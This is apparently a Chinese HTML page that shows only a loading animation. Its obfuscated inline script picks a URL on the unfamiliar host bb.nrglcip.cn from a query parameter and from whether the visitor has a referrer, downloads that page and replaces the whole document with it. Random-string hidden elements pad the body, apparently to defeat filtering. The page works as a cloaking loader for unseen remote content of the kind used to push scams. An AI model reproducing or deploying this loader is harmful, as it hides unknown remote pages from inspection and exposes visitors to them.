<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .znlph6MOxeM {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .znlph6MOxeM .fNYTaYwhSz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .znlph6MOxeM .content {
            line-height: 50px;
            text-align: center
        }

        .znlph6MOxeM .img {
            width: 100%
        }

        .znlph6MOxeM .QnfXQYPnz {
            text-align: center
        }

        .znlph6MOxeM .QnfXQYPnz span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .znlph6MOxeM .QnfXQYPnz span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .znlph6MOxeM .QnfXQYPnz span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .znlph6MOxeM .QnfXQYPnz span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .znlph6MOxeM .QnfXQYPnz span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .znlph6MOxeM .QnfXQYPnz span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .znlph6MOxeM .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vzJ5WkS9rW(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CSqD4 = vzJ5WkS9rW('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CSqD4 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CSqD4 +".html?a=share";
		}
		
        iWq1GK=url+"#"+new Date().getTime();
        iWq1GK && function() {
            $.get(iWq1GK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >fPPO3SQtntGFIA0</li>
<p  style='display:none'>EycRvhLaZA47mo1ZMZkCAoRGRMvP</p>
<li style='display:none' >fPPO3SQtntGFIA0</li>
<a  href='#' style='display:none'>JWKApAOQltoJHX96doJBOiG15yAkXK5997M4u3oNibho0euZAiIbe8OFNC3EWhvre</a>
<b style='display:none' >pl7ZLn1wbWwAcub5fdqAMHdXxtgl0bOUDNCLnX2WWqTamH3ah11RY40AGet</b>
<ul style='display:none' >b4hqMprXcmM1yPdDlFskCCS8LCOabktfb7b0HhNwC7lA4pdqE</ul>
<p  style='display:none'>EycRvhLaZA47mo1ZMZkCAoRGRMvP</p>
<b style='display:none' >pl7ZLn1wbWwAcub5fdqAMHdXxtgl0bOUDNCLnX2WWqTamH3ah11RY40AGet</b><div class="znlph6MOxeM">
    <div class="fNYTaYwhSz">
        <div class="QnfXQYPnz">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >B8vKSmOLL4CJboxPy2yT44jX1Unp3VkMo6mE</li>
<li style='display:none' >B8vKSmOLL4CJboxPy2yT44jX1Unp3VkMo6mE</li>
<img  src='' style='display:none'>
<div style='display:none'>QvApCTvRkvSNkln0YS1rdnh4oaN5YdUwLATyCDMMSJcb3xJL6rEkAgGlPkPRfqjzdqLj</div>
<a  href='#' style='display:none'>rvvJMsawyDAjF</a>
<a  href='#' style='display:none'>rvvJMsawyDAjF</a>
<b style='display:none' >UfmDYYL7JC9p1bAxbzxcmsDPLoHZzvBHkMBZr18bVEfG9rbMQvg3EoWsEAcBskzk5vy8QTpGoHOMAGxuwBQ</b>
<ul style='display:none' >YTITQZY8da4m38zVEsNTmzuUBLU7kEfrPd6TRNvWW6l21mgbcD</ul></body>
</html>